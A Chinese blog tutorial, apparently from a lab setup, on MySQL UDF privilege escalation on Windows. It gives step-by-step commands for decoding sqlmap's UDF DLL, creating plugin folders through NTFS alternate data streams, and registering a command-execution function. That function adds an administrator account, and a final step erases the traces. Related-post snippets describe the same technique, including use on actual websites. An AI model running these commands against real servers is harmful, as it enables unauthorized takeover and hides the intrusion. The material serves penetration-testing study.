Mysql—udf提权

已于 2022-03-17 21:34:01 修改
阅读量1.7k 收藏 2
点赞数 1
分类专栏: windows提权 文章标签: mysql mysql-UDF提权
于 2022-03-17 15:22:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/123544094
版权

文章目录

1.实验环境:

win7 x64
phpstudy 2018
mysql 5.5.53

2.原理

udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。

通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。

3.提权条件

1、知道mysql的用户名和密码,并且可以远程连接
2、mysql有写入文件的权限,即secure_file_prive的值为空,如下图:

show global variables like '%secure%'

使用命令来查看数据库各个用户的访问权限:

select user,host from mysql.user;

使用如下命令将所需要开放的用户的访问权限改为任意:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '*********' WITH GRANT OPTION;

在这里插入图片描述
查看plugin目录:

show variables like 'plugin%';

4. 提权步骤

1. 获取udf文件

sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本,否则会显示:Can‘t open shared library ‘udf.dll‘。

sqlmap\udf\mysql\windows\32目录下存放着32位lib_mysqludf_sys.dll_
sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_
但是sqlmap 中 自带 的shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用的。

我们可以通过以下命令来获取当前数据库及操作系统的架构情况

select @@version_compile_os, @@version_compile_machine;

在这里插入图片描述

显示mysql是32位,操作系统是amd64,我们需要将sqlmap下32位的.dll_文件进行解码:

将其复制到cloak目录下

使用命令:

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll

.dll即是解码后的文件
在这里插入图片描述

2. 将udf文件上传到网站指定目录下

  • MySQL<5.0,导出路径随意;

  • 5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)

  • MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

一般Lib、Plugin文件夹需要手工建立(可用NTFS ADS流模式突破进而创建文件夹)

select @@basedir;  //查找到mysql的目录
 
select 'It is dll' into dumpfile 'C:\\PHPTutorial\\MySQL\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录
 
select 'It is dll' into dumpfile 'C:\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

.dll文件复制到/lib/plugin的目录下

sqlmap中的udf文件提供的函数:

sys_eval,执行任意命令,并将输出返回。

sys_exec,执行任意命令,并将退出码返回。

sys_get,获取一个环境变量。

sys_set,创建或修改一个环境变量。

从udf文件中引入自定义函数

create function sys_eval returns string soname 'udf.dll';    //sys_eval是函数名称,udf.dll是lib_mysqludf_sys.dll_上传后的文件名

在这里插入图片描述

3. 执行自定义函数

//新建账号stray,密码为123456
select cmdshell('net user stray 123456 /add'); 
//将waitalone加入管理员组
select cmdshell('net localgroup administrators stray /add');

4. 清除痕迹

drop function cmdshell; 删除函数
 
delete from mysql.func where name='cmdshell'  删除函数
Stray.io
关注
专栏目录
Mysql(udf提权)
Bu2n的博客
02-11 1017
Mysql udf提权前提步骤难点总结 Mysql udf提权 UDF UDFMySQL中用户定义的函数。这就像在DLL中编写自己的函数,然后在MySQL中调用它们。 前提 存在sql注入漏洞 Mysql文件写入读取权限security_file_priv值为空 数据库用户拥有文件读写权限 数据库用户允许其他主机连接 步骤 利用sql注入获取数据库用户名,密码,密码进行解密获得纯文本 使用osanda用户连接数据库 查看osanda用户的权限 select * from mysql.
MySQL UDF 提权
small_cat's home
10-22 1894
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
MySQL提权UDF提权
2301_76227305的博客
06-08 1443
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
windwos下mysqludf提权
最新发布
weixin_45653478的博客
07-10 1091
UDF(User Defined Functions)即用户自定义函数,通过这种方式可以实现命令执行,其原理是通过lib_mysqludf_sys提供的函数可以执行系统命令 攻击场景:同之前利用日志写WebShell的场景,即堆叠注入或MySQL终端权限或类似phpMyAdmin数据库管理工具后台权限等。
mysql udf提权
weixin_60719780的博客
03-16 1426
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shelludf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
mysql_udf提权
qq_42383069的博客
03-05 3286
0x00. 环境配置: 安装phpstudy,并且以系统服务模式启动 创建普通用户 在服务中将Apache以普通账户启动 赋予apache目录下logs普通账户写入权限 连接大马,测试下当前我们的权限 0x01. UDF介绍与使用: 什么是udfudf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数 为了在mysql中使用此
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 2992
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
Windows与Linux的MYSQL UDF提权分析
m0_57221101的博客
04-03 835
原理分析 什么是UDF 所谓UDF 就是user define function的简称,就是用户自定义函数,用户可以添加函数到mysql中实现功能的扩充,调用方法和一般函数一样类似于database(),但这一功能也导致了自定义函数中可能包含了恶意函数(系统命令),然后恶意的指令被以更高的权限执行后,实现提权的手段。 一般无论是库站分离的服务器,还是库站在一台服务器的情况,我们都是先拿下www的权限之后才有机会接触到数据库连接,毕竟没有多少人会真的打开3306端口把数据库对公,因此我们获得一个数据库的
sqlmap mysql udf提权_MySQL数据库提权UDF
weixin_39683172的博客
01-30 508
UDFUDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。windows下udf提权的条件·如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/·如果mysql版本小于5.1...
Mysql提权UDF提权
一个普普通通的博客
04-17 913
数据库提权较为实用,但只有在root权限才可以提权 mysql提权udf提权) 借用于mysql func,对认证的用户,只要拥有INSERT和DELETE权限,就可以在任意数据库下l创建一个函数攻击数据库 拿到webshell后先看数据库,一般存放于inc目录,配置文件是config.php 拿到账号密码直接登录 传udf.dll mysql版本大于5.1时,udf.dll要放在mysql\lib\plugin目录下,小于5.1时,文件放在C盘windows目录或windows32 如果没有plug
mysql 远程_MYSQL开启远程访问权限的方法
weixin_39737757的博客
01-18 270
1、登陆mysql数据库mysql -u root -p查看user表mysql> use mysql;Database changedmysql> select host,user,password from user;+--------------+------+-------------------------------------------+| host | use...
Mysql-UDF提权
告白的博客
08-14 1822
0x00 提权简介 UDF介绍:User Defined Functions简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。 简单来说便是利用提权脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell权限。 我们需要将duf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路
Mysql UDF提权
fengling132的专栏
05-19 2089
2011-08-17 1:14 今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。 测试经典的UDF.dll提权一次性成功。 dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。 首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。
MySQL udf提权
weixin_45945976的博客
12-02 960
MySQL udf提权 UDF提权这个利用还是不太常见的,因为在mysql5.1版本以后对注册的UDF的位置有了限制,而在默认的是没有\lib\plugin文件夹的,一般需要root用户修改。 什么是UDF UDF就是User Defined Function,用户自定义函数,即通过用户添加的函数来对MySQL的功能进行补偿 怎么使用UDF 我的mysql版本:5.7.26,所以我的是默认没有plugin这个目录的 查看secure_file_priv的指 secure_file_priv是用来限制load
MySQLUDF提权
shawdow_bug的博客
03-05 392
UDF和dll文件 UDF全称User Defined Function,即用户自定义函数,在MySQL中以加载外部插件(dll文件)的方式来创建函数。 我解释一下dll文件: dll文件,又指库文件、动态链接库文件,与之相对的是静态库。我们知道,在编写程序经常需要导入其它库文件以使用内置接口或函数,这些接口或函数如果以静态库的方式引入,那么就先把所有需要用到的程序(包括内置接口和函数)链接在一起,再装载到内存运行。 如果是以动态链接库文件(dll)的方式引入,则是先执行主程序,当用到其它程序时,动态加载
MysqlUDF提权
热门推荐
内心不种满鲜花就会长满杂草
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
mysql udf 提权
03-06
需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值